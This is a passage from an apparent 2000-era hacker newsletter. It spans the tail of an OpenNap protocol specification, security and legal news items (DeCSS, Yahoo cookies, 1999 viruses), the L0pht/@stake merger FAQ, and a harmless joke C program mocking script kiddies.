<channel> <message> 403 public message [SERVER] <channel> <nick> <text> this message is sent by the server when a client sends a public message to a channel. Example: 80's espinozaf hello...hola 404 user/channel does not exist [SERVER] <error-message> This message is sent to the client when the client has requested an operation on another client or channel which is invalid. Examples: User nosuchuser is not currently online. Channel #nosuchchannel does not exist! permission denied ping failed, shtien is not online 405 join acknowledge [SERVER] <channel> the server sends this message to the client to acknowlege that it has joined the requested channel (400) 406 join message [SERVER] <channel> <user> <sharing> <link-type> <user> has joined <channel> Example: 80's WilmaFlinstone 12 2 407 user parted channel [SERVER] <channel> <nick> <sharing> <linespeed> Example: 80's DLongley 23 7 408 channel user list entry [SERVER] this message is identical to the join (406) message. the server will send the list of users in the channel prior to the client join command in this message. joins that occur after the client has joined will be noted by a 406 message. 409 end of channel user list [SERVER] <channel> this message is sent by the server to indicate it has sent all informati about the users in a channel 410 channel topic [CLIENT, SERVER] <channel> <topic> sent when joining a channel or a new topic is set. a client requesting topic change also uses this message. [why didn't they put a field to indicate WHO changed the topic? as it is now you can only tell that it was changed. -ed] 500 alternate download request [CLIENT] <nick> "<filename>" requests that <nick> make an outgoing connection to the requesters client and send <filename>. this message is for use when the person sharing the file can only make an outgoing tcp connection because of firewalls blocking incoming messages. this message should be used to request files from users who have specified their data port as 0 in their login message 501 alternate download ack [SERVER] <nick> <ip> <port> "<filename>" <md5> <speed> this message is sent to the uploader when their data port is set to 0 to indicate they are behind a firewall and need to push all data outware. the uploader is responsible for connecting to the downloader to transfer the file. 600 request user's link speed [CLIENT] <nick> 601 link speed response [SERVER] <nick> <linespeed> 603 whois request [CLIENT] <nick> 604 whois response [SERVER] <nick> "<user-level>" <time> "<channels>" <status> <shared> <downloads> <uploads> <link-type> "<client-info>" [ <total uploads> <total_downloads> <ip> <connecting port> <data port> <email> ] <user-level> is one of "User" or "Admin" <time> is seconds this user has been connected <channels> is the list of channels the client is a member of, each separated by a space (ASCII 32) <status> is one of "Active." or "Inactive." if they are on or offline <shared> is number of files user has available for download <downloads> is the current number of downloads in progress <uploads> is the current number of uploads in progress <link-type> see 0x02 (client login) above <client-info> see 0x02 (client login) above The following fields are displayed for user level moderator and above: <total uploads> <total downloads> <ip> note: can be "unavailable" <connecting port> <data port> <email> note: can be unavailable Example: lefty "User" 1203 "80's " "Active" 0 0 0 3 "nap v0.8" 605 whowas response [SERVER] <user> <level> <last-seen> if the user listed in a 603 request is not currently online, the server sends this message. <user> is the user for which information was requested <level> is the user's last known userlevel (user/mod/admin) <last-seen> is the last time at which this user was seen, measured as seconds since 12:00am on January 1, 1970 (UNIX time_t). 606 change user level [CLIENT] <nick> <level> changes the privileges for <nick> to <level>. client must be admin level to execute this request [I have not verified this message since I don't have admin status on any of the servers. -ed] 607 upload request [CLIENT] <nick> "<filename>" this message is used to notify the client that user <nick> has requested upload of <filename> Example: lefty "generic band - generic song.mp3" 608 accept upload request [CLIENT] <nick> "<filename>" client is notifying server that upload of <filename> to <nick> is accepted, and that the requesting client may begin download Example: lefty "generic band - generic song.mp3" 610 kill (disconnect) a user [CLIENT] <nick> client request to disconnect a user. client must be "Admin" level to execute this command 611 nuke a user [CLIENT] <nick> client request to delete account for <nick> 612 ban user [CLIENT] 613 set data port for user [CLIENT] 614 unban user [CLIENT] 615 show bans for server [CLIENT] client requests the list of banned ips for the current server 616 ip ban notification [SERVER] <ip> <nick> "<reason>" <time> <ip> is the string version of the ip banned <nick> is the user setting the ban <reason> is the reason given <time> is the time_t when the ban was set This message is sent in response to the 615 client request, one for each ban. Example: 207.172.245. valkyrie "" 947304224 617 list channels [CLIENT, SERVER] no data. client requests a list of channels on the server. server responds with 618/617 server indicates end of channel list using this message. 618 channel list entry [SERVER] <channel-name> <number-of-users> <topic> this is the server response to a 617 client request, one for each channel. Example: Help 50 OpenNap help channel 620 ??? [SERVER] <nick> "<filename>" <filesize> <digit> 621 message of the day. sent after client login [SERVER] <motd-text> each 621 message contains a single line of text 622 muzzle a user [CLIENT] <nick> [ <reason> ] client requests that <nick> not be allowed to send public messages 623 unmuzzle a user [CLIENT] <nick> client requests that the enforced silence on <nick> be lifted 624 un-nuke a user 625 change a user's linespeed 626 data port error <user> client is informing server that it was unable to connect to the data port for <user> 627 operator message [CLIENT, SERVER] client: <text> server: <nick> <text> client request to send a message to all admins/moderators 628 global message [CLIENT, SERVER] client: <text> server: <nick> <text> client request send a message to all users 629 banned users [SERVER] <nick> when displaying the ban list for the server, this message is used to indicate banned nicknames. 700 change link speed [CLIENT] <speed> client is notifying server that its correct link speed is <speed>, in the range 0-10 (see the login message for details). 702 change email address [CLIENT] <email address> client wishes to change their email address 703 change data port [CLIENT] <port> client is changing the data port being listened on for file transfers 751 ping user [CLIENT, SERVER] <user> client is attempting to determine if <user>'s connection is alive 752 pong response [CLIENT, SERVER] <user> this message is sent in response to the the 751 (PING) requeset 753 ??? [returns permission denied. -ed] 800 reload config [CLIENT] <config variable> resets configuration parameter to its default value 801 server version [CLIENT] no data. client request's a server's version 810 set config [CLIENT] <config string> request a change in server configuration variables 820 clear channel <channel> [what does this do? -ed] 821 ??? 822 ??? 823 ??? 824 ??? 825 user list entry [SERVER] <channel> <user> <files shared> <speed> an 825 message is sent for each user in the channel specified by the 830 message Example: Help testor3 0 3 [This appears to be exactly the same format as the 408 message. -ed] 826 ??? 827 ??? 830 list users in channel [CLIENT, SERVER] <channel> client requests a list of all users in <channel>. server responds with a 825 response for each user, followed by an 830 response with no data [why didn't they just use the 409 message? -ed] 3. MD5 It looks like the vast majority of the files are hashed using the first 299,008 bytes of the file. There have been some cases where the hash matches at 300,032 bytes, but no correlation has been drawn as to when that happens. The speculation at this point is that it might have to do with the existence of a ID3v2 tag, or perhaps the file was sampled at 48kHz...? Note: the linux nap client (versions 0.7 - 0.9) seem to hash exactly 300,000 bytes, which is NOT what the official windows client does. 4. Where to get more help? Join the napdev mailing list by sending email to napdev-subscribe@onelist.com or by visiting the community page http://www.onelist.com/community/napdev/. This list is designed for open source napster developers to share information about the specification or applications. 5. Acknowledgements A big THANKS goes to the following people who contributed valuable information to this specification: Ben Byer <bbyer@rice.edu> JT <jtraub@dragoncat.net> Evan Martin <eeyem@u.washington.edu> Colten Edwards (aka panasync@efnet) <edwards@bitchx.dimension6.com> @HWA 63.0 HNN: Jan 27: DVD Lawyers Shut Down Courthouse ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Santa Clara County Superior Court Judge William Elfving has sealed the court documents filed by the DVD Copy Control Association because they contain the source code to the DeCSS program. The documents have been publicly available for the last two weeks and have been posted to the internet. Some lawyers have noted that by failing to file the documents under seal from the beginning may jeopardize the plaintiff's case. C|Net http://news.cnet.com/news/0-1005-200-1533048.html?tag=st.ne.1002.bgif.1005-200-1533048 Wired http://www.wired.com/news/politics/0,1283,33922,00.html C|Net; DVD lawyers spill "secret" code By Evan Hansen Staff Writer, CNET News.com January 26, 2000, 4:10 p.m. PT A digital rights licensing group seeking to ban the controversial DVD decryption program known as DeCSS has shut down yet another potential distributor: a California state courthouse. Santa Clara County Superior Court Judge William Elfving today placed under seal source code submitted in a trade secrets case filed by the DVD Copy Control Association against 72 Web sites and individuals earlier this month. The order for now erases an embarrassing gaffe by attorneys for the group, which is seeking to stop the defendants from publishing or linking to the very same program on the Internet. It was unclear whether the apparent slip-up could have deeper consequences for the case. Court papers are generally considered public documents, available to anyone for the asking. Although parties in a case can file a request with the court to make sensitive documents off-limits, the Copy Control Association's attorneys apparently filed the request only after openly submitting the source code as a supporting document to the complaint. As a result, the document has been legally available at the courthouse for the past two weeks. But the document was lifted from the court and made available on the Internet at the Cryptome.org Web site. The association's lead attorney in the case, Jeffrey Kessler of the New York law firm Weil, Gotshal & Manges, called today's ruling a non-event. "Everyone knew (the exhibit) would be placed under seal," he said. Kessler declined to elaborate on how the exhibit was introduced in the case, saying only that after today's decision the issue "has no further significance whatsoever." But lawyers for the defense and intellectual property attorneys uninvolved in the case said the gaffe could hurt the plaintiffs' case. "It sounds like the plaintiffs goofed," said Judy Jennison, head of Perkins Coie's Silicon Valley intellectual property litigation practice and an experienced trade secrets trial attorney who is not involved in the case. "If they didn't file it under seal, they could be seen to have given up the their (trade secret) rights." Attorney Allonn Levy, who is representing defendant Andrew Bunner in the case, agreed. Even if the document was inadvertently made public, he said, it could jeopardize the trade secret status of the material. "Anyone could have copied out the trade secrets from the file before it was sealed," he said, although he added that he did not know whether anyone had done so. "That raises a serious question of whether that material is protectable." According to defendants in the case, DeCSS was created by legal reverse engineering techniques to allow DVDs to be played on the Linux platform. Since its release, however, the film industry has vilified the program as an illegal hack aimed at producing illegal copies of DVD movies. In addition to the Copy Control Association's suit in California, member companies of the Motion Picture Association of America (MPAA) filed a lawsuit in New York against individuals for alleged violations of the Digital Millenium Copyright Act. The judges in both cases have issued preliminary injunctions prohibiting the defendants from posting the code throughout the trials' durations. The Electronic Frontier Foundation, which is defending the parties in both cases, argues that people have a right to discuss the "the technical insecurity of DVD" and to demonstrate their points through reverse engineering. The DVD association was formed in December of last year by member companies of the MPAA, the Business Software Alliance and the Electronic Industries Alliance to license out the DVD Content Scrambling System. News.com's Courtney Macavinta contributed to this report. -=- Wired; DVD Lawyers Make Secret Public by Declan McCullagh 3:05 p.m. 26.Jan.2000 PST Lawyers representing the DVD industry got caught in an embarrassing gaffe when they filed a lawsuit and accidentally publicized the computer code they wanted to keep secret. The DVD Copy Control Association included its "trade secret" source code in court documents, but forgot to ask the judge to seal them from public scrutiny. Whoops. In a hastily arranged hearing Wednesday morning, DVD CCA lawyers asked Santa Clara Superior Court Judge William J. Elfving to correct their oversight, and he agreed to keep the document confidential. It may be a little late. The document is dated 13 January and is widely available on the Web. The owner of one site that placed the 140KB declaration online says over 21,000 people have downloaded it so far. The 11KB "CSSscramble" source code, part of the larger declaration of DVD CCA president John Hoy, cannot be readily compiled into a DVD viewer or copier. But if it had not been released online last October, the DVD encryption scheme likely would not have been penetrated. Elfving granted an injunction last Friday, ordering 21 defendants to stop posting DeCSS software -- which allows compressed video images to be copied from a DVD disc onto a hard drive -- on their Web sites. The blunder won't help the DVD CCA attorneys in their as-yet quixotic quest to rid the Net of DeCSS. The entertainment industry frets that such programs could eventually allow widespread piracy of movies. One California litigator who specializes in Internet and intellectual property cases says the boner won't derail the DVDCCA's lawsuit filed last month in state court. "The fact that these lawyers inadvertently filed with the court the source code and that made it a public document does not have a [substantial impact]," says Megan E. Gray, a lawyer in the Los Angeles office of Baker and Hostetler. Gray said the biggest effect might be to mute the rhetoric of DVD CCA lawyers. "It's difficult to say it's an outrage ... when you yourself have contributed to public disclosure. It undermines your credibility," Gray said. Making an already difficult task even more tricky for DVD CCA lawyers is that both the four-page CSSscramble source code and the DeCSS utility have been mirrored by dozens -- perhaps hundreds -- of Internet users in a kind of global keep-away game. Activists outside a hearing even distributed copies of CSSscramble to people outside the courthouse, prompting a DVD CCA attorney to enter the document into official court records. Jeffrey Kessler, the plaintiff's lead attorney from Weil, Gotshal and Manges, told the judge at the time that CSSscramble was a trade secret and should be confidential. "I don't want to endanger their trade secret status by putting them in the public record," Kessler said, according to a transcript. He did not immediately return phone calls. One of his colleagues separately asked that a defense exhibit with CSSscramble be placed under seal. "DVD CCA requests the court place the [declaration] under seal to avoid placing this information in the public record," Jared Bobrow wrote in a six-page brief on 9 January. But both forgot about the DVD CCA president's exhibit -- that included CSSscramble -- until this week. "We still haven't waived our arguments that it has been entered into public domain and trade secret protection has been waived by the other side. We're going to pursue that," said Robin Gross, staff attorney for the Electronic Frontier Foundation, which is representing some of the defendants. "It threatens their case against the [DeCSS] utility. Their argument is that this information is highly protected trade secrets and they go through all the extremes to make sure the protection is in place," Gross said. "Our position is that they've waived trade secret protection from entering this into the public domain." Gross said EFF had not decided whether to appeal the preliminary injunction or ask for a trial. @HWA 64.0 HNN: Jan 27: Yahoo May Be Violating Texas Anti-Stalking Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Universal Image, a Dallas based educational video provider, filed a $4 billion lawsuit against Yahoo and its Yahoo Broadcast unit last December. The suit alleges that Yahoo violated state law through the use of cookies that can be used to track surfers around the web and may violate the Texas anti-stalking law. C|Net http://news.cnet.com/news/0-1005-200-1533164.html?tag=st.ne.1002.bgif.1005-200-1533164 Texas company accuses Yahoo of privacy violations By Bloomberg News Special to CNET News.com January 26, 2000, 4:45 p.m. PT DALLAS--Yahoo has been accused by closely held Universal Image of violating Texas' anti-stalking law by allegedly tracking computer users' every movement on the Internet without their consent. Universal Image, which does business as Chalkboardtalk.com on the Web, made the claim as part of a $4 billion lawsuit against Yahoo and its Yahoo Broadcast unit. Dallas-based Universal Image, an educational video provider, filed the suit in December. Universal Image has asked a Dallas judge to declare that Yahoo violated state law through the use of "cookies"--files attached to the computer of an Internet user that collect such information as names and addresses, Universal Image's attorneys said. The lawsuit "concerns the right of privacy of every Internet user in America," said Larry Friedman, an attorney for Universal Image. A Yahoo representative declined comment. Copyright 2000, Bloomberg L.P. All Rights Reserved. @HWA 65.0 HNN: Jan 27: Data From Probes of Takedown.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William The web site for John Markoff's book Takedown is an obvious target for online vandals. A histogram of attack attempts to www.takedown.com has been released that correlates intrusion attempts and real-world events. National Partnership for Advanced Computation Infrastructure http://security.sdsc.edu/incidents/ Takedown.com http://www.takedown.com/ FREE KEVIN http://www.freekevin.com/ 66.0 HNN: Jan 27: Top Ten Viruses of 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by nvirB Anti-virus software firm Sophos has released its list for the top ten viruses of 1999. Form, a virus almost ten years old, makes it to number 9 on the list and six of the ten are word macro viruses. (Does anyone really use macros for anything other than viruses?) Sophos.com http://www.sophos.com/pressoffice/pressrel/uk/20000125virusreport.html BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_619000/619687.stm Sophos: (Article unavailable, host was not responding - Ed) BBC; By BBC News Online's Damian Carrington An analysis of the most common computer viruses of 1999 shows that although the threat of new self-propagating viruses is growing, older viruses are still very common. One boot sector virus, Form, is nearly a decade old but still appears in the top ten. The table was compiled by anti-virus software firm Sophos, based on thousands of calls for help to the company. The three self-propagating viruses were Melissa, ExploreZip and Ska-Happy99 which forward themselves by hijacking a computer's email program. This means that instead of taking months to spread into the wild, these viruses have the potential to attack globally within days. However, Graham Cluley, senior technology consultant for Sophos, believes that old viruses still pose a major threat: "Some viruses become so common, they will never become extinct - they will always lurk on a floppy disk in someone's drawer. "Also, people may be aware of the latest scare but not the background threat. It's difficult to get people excited about old threats." Spreading out The most reported virus in 1999 was a macro virus called Laroux and was first detected in early 1996. Unusually for a widespread macro virus, Laroux infects Excel spreadsheets rather than a Word document. "It may be that people are getting quite cautious about opening documents, as they may have been hit by that before, but are not so used to the threat of spreadsheets," says Mr Cluley. According to Mr Cluley, the key to long-lived viruses is being virtually invisible. "Viruses which jump up and down with very destructive payloads draw attention to themselves and effectively kill themselves off, like lemmings. "Form does nothing, it just spreads, although it still causes damage by using up system resources." Silent but deadly Whilst having your hard disk wiped by a virus may seem the computer equivalent of Armageddon, many companies and individuals keep back-up copies of information. Some of the most damaging viruses are not destructive at all, says Mr Cluley. "Some, like Melissa, can forward documents to e-mail addresses stored on your computer - highly confidential information has leaked from companies in this way," he says. And "data diddler" viruses exist which make subtle changes to data in a spread sheet. "If those are your company results, it could be very embarrassing," he adds. The year 2000 will see hoax viruses - email warnings of non-existent viruses - continue to cause enormous problems believes Mr Cluley. "In a way they are far more damaging than real viruses as they set off e-mail hurricanes and you can't disinfect a hoax. "We had far more people seeking information on a hoax about a game involving Santa and his elves than any real virus." Finally, Mr Cluley and other anti-virus experts are awaiting the sentencing in February of David L Smith, who pleaded guilty to distributing the Melissa macro virus and admitted causing more than $80m damage to North American companies. "We are rather hoping that, depending on what the sentence is, it may send out a message to virus authors that this isn't cool and the authorities are prepared to pursue you." @HWA 67.0 HNN: Jan 27: French Eavesdrop on British GSM Phones ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Cryptome FRENCH intelligence has invested millions in satellite technology so that it can intercept British businessmen's wireless GSM telephone calls. The French government upgraded signals intelligence last year. Now secret service agencies are using the technology to listen in to commercial secrets. At least eight centers, scattered across France, are being "aimed" at British defense firms, petroleum companies and other commercial targets. Sunday Times http://www.sunday-times.co.uk/news/pages/Sunday-Times/stinwenws03006.html?999 ( 404 - they've moved it or eaten it or something, couldn't find it - Ed) @HWA 68.0 So wtf is the deal with l0pht and @stake? here's the FAQ jack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ For those of you that need things spelled out for you ($$$) here's what happened with l0pht and @stake ($$$) - Ed L0pht/@Stake Merger FAQ 1. Is it true? Did L0pht Heavy Industries actually merge with @Stake? 2. Why did you do it? You seemed to have a perfect club-house environment. 3. So, how's the cultural fit with @Stake? How do the L0pht's values fit in there? 4. So what's going to happen to the old L0pht space you were in? 5. And what about the webpage? Is it going to go away? Is it going to be put on 'atstake.com'? 6. What exactly is L0pht doing over at @Stake? Are you consulting now? 7. What's going to happen to all the advisories? Are you still going to publish them? 8. Are you still going to sell L0phtCrack? And AntiSniff? Will there be new versions? 9. What's the deal with Hacker News Network anyway? Is that actually part of L0pht, and was it picked up by the merger? 10. How does it feel working with a bunch of business stiffs? 11. What are the financial makings of this merger? 12. You talk about 'Strategic Security Solutions' on the @Stake webpage, and you talk about being truly 'vendor-neutral'... isn't that what everyone else is doing? What makes @Stake different? Explain in small words. (Yeah we're all dumb fuckers out here, - Ed) 13. I don't trust hackers like you. Why should I? 14. Are you still going to get drunk and rant at cons? What about your 'professional image'? 15. Are you hiring? Can I be a L0pht Member? 16. Does @Stake have an open-door policy? 17. Are you still going to the MIT Swapfest and selling funky stuff? 18. Are you still using your handles? Or are you going to use your real names now? 19. What's up with Guerilla Net? Are you guys still doing hardware projects over at @Stake? 20. Will you be coming out with any more T-shirts? 1. Is it true? Did L0pht Heavy Industries actually merge with @Stake? YES. L0pht Heavy Industries was incorporated, had employees on the payroll, and sold software products and consulting services. In short, we were a real company and had been operating that way for a couple years. L0pht Heavy Industries legally merged with @Stake in the beginning of 2000 so we are all one company now. The new company will go by the name of @Stake. 2. Why did you do it? You seemed to have a perfect club-house environment. We strived to be (and achieved) a pure R&D environment. Unfortunately pure research and development is not a very profitable arena. In addition, one needs business people, sales and productization of services. So, while we tried to keep the research and fun environment we were fighting a losing battle in making ends meet. To summarize, we had problems scaling. Everyone was spending more money and effort doing less research and experiments. The L0pht wanted desperately to avoid having to compromise our goals and ideals which would have happened if we had continued to go the route we were. The solution was obvious. We needed to find an organization that valued the R&D work that we did, could benefit from it, profit from it, and enable us to keep contributing to the community. We feel very fortunate in having come across such people in @Stake. We see this as a win-win situation where we will be able to do a lot of the research that we were unable to do while just being the L0pht. We also feel very fortunate in finding an organization that did not expect us to about-face in the way we approach sharing our findings with people. 3. So, how's the cultural fit with @Stake? How do the L0pht's values fit in there? Here is a PARTIAL list of components that we find work very well with our VALUES and make us very comfortable about the merger: @Stake is aiming to be completely product / vendor neutral. This enables them to make the best design decision and recommendations possible to the customer without unknown biases. This is accomplished in the following ways: @Stake will not take commissions / kick-backs from product vendors for recommending a product into a customer. @Stake is in the business of providing strategic services rather than tactical ones. What this means is that they see the benefit in helping design / implement solutions with security and functionality from the beginning rather than looking for known problems and helping to only remediate them when they could have been avoided all together. @Stake will not sell products. Thus they do not have customers being worried that they will recommend their own product even if it might not be the best solution. What this means to us is that we get to continue coming out with tools and programs but are forced to give them away for free! How cool is that! We are completely non-biased in our opinions of products and technologies, and we are able to continue our experimentation and reverse-engineering of such. This also allows us to continue our "consumer reports"-style announcements, papers and research. @Stake is committed to a strong research and development leg as a method of always being a leader and not just a follower. @Stake wants smarter customers rather than dumber ones in the community. By helping to educate everyone as much as possible it not only helps differentiate the company but allows more interesting and thorough solutions to be deployed for customers. This is the same belief that the L0pht has always held. 4. So what's going to happen to the old L0pht space you were in? We still have the space. Some of the hardware projects that were going on over there are just not practical to move. We are also setting up new lab space that has many of the things that we could not manage at the old location. 5. And what about the webpage? Is it going to go away? Is it going to be put on 'atstake.com'? Not in the immediate future. There will obviously be a period of time before we manage to fully integrate everything. As was stated in a previous response one of the reasons we embarked upon this merger is due to the like-minded beliefs. So, when the two web sites finally merge you can expect to find the same sort of information that is currently published in an even better format. It might even be that they stay as individual web sites, one focusing more on R&D and the other on business angles. What it boils down to is that you can expect some changes but the main focus will be quite similar to what it currently is. 6. What exactly is L0pht doing over at @Stake? Are you consulting now? The L0pht forms the nucleus of the Research and Development group in @Stake. By continuing to push the envelope in security research we can help productize new services to the consulting and business legs of @Stake. 7. What's going to happen to all the advisories? Are you still going to publish them? The L0pht will continue to publish advisories. This will not change. The L0pht never did and never will publish an advisory based upon insider information that would betray someones trust. However, we will continue to act as a Consumer Reports style organization in posting our general findings through analysis and evaluation as general customers reviewing software. We still beleive in Full-Disclosure in our advisories. We are also happy that we will be better able to work with companies in giving them advance notice before posting publicly to the world. 8. Are you still going to sell L0phtCrack? And AntiSniff? Will there be new versions? Since @Stake is purely a consulting services company, it did not acquire the products that were sold commercialy from the L0pht. L0phtCrack and AntiSniff are being moved to a holding company independent of @Stake and will continue to be sold. We will be donating the proceeds (after operational expenses) to non-profit and educational organizations. The free versions will continue to be free and include source code. A new version of L0phtCrack was 95% complete at the time of the merger. The authors will probably finish the last bit and release L0phtCrack 3.0 but the schedule is uncertain. A Linux version of the researchers version of AntiSniff is underway and will be released under the same free researchers license that the command line AntiSniff currently has. 9. What's the deal with Hacker News Network anyway? Is that actually part of L0pht, and was it picked up by the merger? Hacker News Network was run by l0pht employees on l0pht equipment so it certainly was a part of l0pht. We feel it provides a valuable news source to the security community so it will continue to operate as part of @Stake. We expect to be able to spend more time and resources in making it an even better resource for the community. 10. How does it feel working with a bunch of business stiffs? @Stake is definitely not populated with a bunch of business stiffs. One of the reasons L0pht merged with @Stake was the quality of the people there. They understand our vision of computer security. Some of them would even be considered hackers exactly the same way we think of ourselves as hackers. Things are a bit more businesslike at the merged company but the place is a place that values openness, diversity, creativity, thinking outside of the box, and coming up with non-conventional solutions. 11. What are the financial makings of this merger? @Stake is not a publicly traded company right now and as such we are not able to give those details. We are happy to say that the main impetus for the merger was the ability to engage in much more grandious research work and not compromise our morals in the process. We started into this field in order to learn, educate, and contribute and are happy to say that we should only be able to do this things even better now. 12. You talk about 'Strategic Security Solutions' on the @Stake webpage, and you talk about being truly 'vendor-neutral'... isn't that what everyone else is doing? What makes @Stake different? Explain in small words. The answer to question #3 should help on the vendor-neutral aspect being more than just lip service. As for the 'Strategic Security Solutions' this is similar to how the L0pht always handled customers. An example in the software world between tactical and strategic might help: Problem: A buffer overflow was found in a section of code. The offending call was the unbounded strcpy(). Tactical approach: Replace that particular strcpy() call with the bounded strncpy(). If a similar problem is found elsewhere later on fix that one after it is reported. Repeat as necessary. Strategic approach: From the design point help model with security involved. Use bounded string functions to remove that class of future problems. Obviously the above is just an example of the way we see tactical being different from strategic approaches. This is how we view all projects be they in the infrastructure, content, operational, network, etc. fields. It also does not preclude us from implementing tactical solutions as necessary but the main focus is enabling, not only reacting. 13. I don't trust hackers like you. Why should I? We call ourselves hackers using the original, positive meaning of the word. A good definition can be found in Eric Raymond's Hacker's Dictionary. We think hackers have higher ethical standards than most in the business world. We do not do anything illegal with our computers or anyone else's. We get our kicks finding and solving security vulnerabilities in products and technologies using our own networks, hardware, and other resource. This is the way we have always operated and that is the way we will continue to operate. If you can't relate to this, then you should probably reinvestigate the meaning of the word 'hacker'. 14. Are you still going to get drunk and rant at cons? What about your 'professional image'? We will continue to be involved in conferences the way we always have. Don't you think that if @Stake had told Mudge he would not be able to have a beer with his friends and talk about crypto-systems that would have been a show stopper for the merger right there? 15. Are you hiring? Can I be a L0pht Member? We are definitely hiring. We cannot thrive and be the leader in security without the best people on the planet. Submit your resume to jobs@atstake.com if you are interested. We want to work with the best and you probably do, too. If you have top notch security skills in consulting or research we urge you to apply. That being said, we cannot accept everyone that applies but will do our best to make sure everyone gets a fair shake. The L0pht is fully integrated with @Stake so there is no seperate group of people called "L0pht Members". We are proud to call ourselves members of the @Stake team. We will now be known as 'The Hackers Formerly Known As The L0pht', or perhaps some unpronouncable symbol. 16. Does @Stake have an open-door policy? @Stake operates in a similar fashion to most other professional service organizations. The reason we went to the closed door policy at the L0pht was to enable ourselves to get work done and not just have the place be a local hang-out for people wanting to kick back with a beer and watch TV. While we will be more accesible at @Stake, we are there to do R&D work and as such it will continue to not be an open-door-hangout type environment. Keep in mind, however, that L0pht has not had a true open-door policy for many years. At our original location, the L0pht was more of a club-house and place for general hanging-out of hackers from around the world. When we moved to our new location and decided to do real research and provide to the community, the L0pht was not open for everybody. We occasionally gave tours and threw parties, but the space was not open for visitors 24 hours a day. 17. Are you still going to the MIT Swapfest and selling funky stuff? We will still be going to the MIT Swapfest to see people and pick up various things. We hope we won't have to sell our scraps at it anymore in order to make ends meet :) However, as most people going to the MIT flea, we will also want to "upgrade our junk pile". We will be selling, just not every month as in the past. 18. Are you still using your handles? Or are you going to use your real names now? We have been using our handles for over 10 years now. It is what we have published under in academic journals, magazines, books, given training courses under, and provided recommendations to the US Senate under. As such they are as much our recognized names in the security community and we will continue to use them. Many companies seem to be scared of doing business with people using pseudonyms or handles. This is a problem that we would like to solve. We are not really hiding from anyone, but this is how we've been known for a long time, and for some, is what our parents call us. We hope to educate those companies by showing them that its not the name that's important, rather the information and services that can be provided. 19. What's up with Guerilla Net? Are you guys still doing hardware projects over at @Stake? @Stake has committed to enabling the R&D labs to work on hardware related projects as well as protocol and software ones. We see an ultimate marriage between all of these areas as technology is progressing and would be remiss if we turned a blind eye towards any of them. 20. Will you be coming out with any more T-shirts? The T-shirts were fun little projects that we did more out of amusement than anything else. Should the opportunity and inspiration strike again we would not rule out the possibility of coming out with some new designs. @HWA 69.0 Anti-Offline releases majorly ereet 0-day script kiddie juarez! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Feb 12th (or in around there, something like that, check the site and YEH it is a joke, just in case any AOL admins are looking at the code *g* - Ed ) <snip> /******************************************* * ANTIOFFLINE INTRODUCES SCNEWH0RE v6.9 * * coded by sil@antioffline * * Don't try this at home script kiddies * * Elite shouts to Kevin Mitnick who we * * hope someday goes back to jail so we * * could have a reason 2 0nw0r1z3 websites * * again. Tested on RedCrap AOL Linux 6.1 * * gcc filename.c -o f00name && ./f00name * *******************************************/ #include <stddef.h> #include <stdio.h> #include <unistd.h> #include "pthread.h" void * process(void * arg) { int i; /* INSERT uberleet cursing... makes luzers fear us */ fprintf(stderr, "Starting pimpage biAtch %s\n", (char *) arg); for (i = 0; i < 10000; i++) { write(1, (char *) arg, 1); } return NULL; } int main(void) { int retcode; pthread_t th_a, th_b; void * retval; // insert a shitload of comments // these don't make sense but when people // see them, they will know we are ejeet // they will fear our 45535!@#$* retcode = pthread_create(&th_a, NULL, process, (void *) "s"); if (retcode != 0) fprintf(stderr, "create s failed asshole %d\n", retcode); /* insert more shit to make this bitch longer */ retcode = pthread_create(&th_b, NULL, process, (void *) "c"); /* gn0 your role */ if (retcode != 0) fprintf(stderr, "create c failed too moron %d\n", retcode); retcode = pthread_create(&th_b, NULL, process, (void *) "e"); if (retcode != 0) fprintf(stderr, "create e is fucked up too %d\n", retcode); retcode = pthread_create(&th_b, NULL, process, (void *) "n"); if (retcode != 0) fprintf(stderr, "create n is also fucked up %d\n", retcode); retcode = pthread_create(&th_b, NULL, process, (void *) "e"); if (retcode != 0) fprintf(stderr, "your a dipshit jackass %d\n", retcode); retcode = pthread_create(&th_b, NULL, process, (void *) "w"); if (retcode != 0) fprintf(stderr, "learn to compile scriptkiddie %d\n", retcode); retcode = pthread_create(&th_b, NULL, process, (void *) "h"); if (retcode != 0) fprintf(stderr, "AntiOffline 0wns your ass %d\n", retcode); retcode = pthread_create(&th_b, NULL, process, (void *) "0"); if (retcode != 0) fprintf(stderr, "Hope you don't make a living off this %d\n", retcode); retcode = pthread_create(&th_b, NULL, process, (void *) "r"); if (retcode != 0) fprintf(stderr, "your almost finished fucking things up %d\n", retcode); retcode = pthread_create(&th_b, NULL, process, (void *) "e"); if (retcode != 0) fprintf(stderr, "stick to hax0ring hotmail fuckwad %d\n", retcode); return 0; } <snip> @HWA 70.0 HNN: Jan 31: MS Issues Security Patch for Windows 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse The newest version of the windows operating system, technically still in beta and not scheduled for release until February 17, 2000, has a major security hole. Microsoft has been quick to issue a patch for the hole that allows web surfers to view files stored on a targeted web server. The problem lies with Microsoft Index Server which is built into Windows 2000. At least six banks and three major computer manufacturers have been effected by the bug. (What the hell are they doing using beta software on production systems anyway?) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2429334,00.html?chkpt=zdnntop MSNBC http://www.msnbc.com/news/363355.asp @HWA 71.0 "Have script Will destroy" - a buffer overflow article ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ This article uses purty graphical pikturez so you may want to check the original site. Have 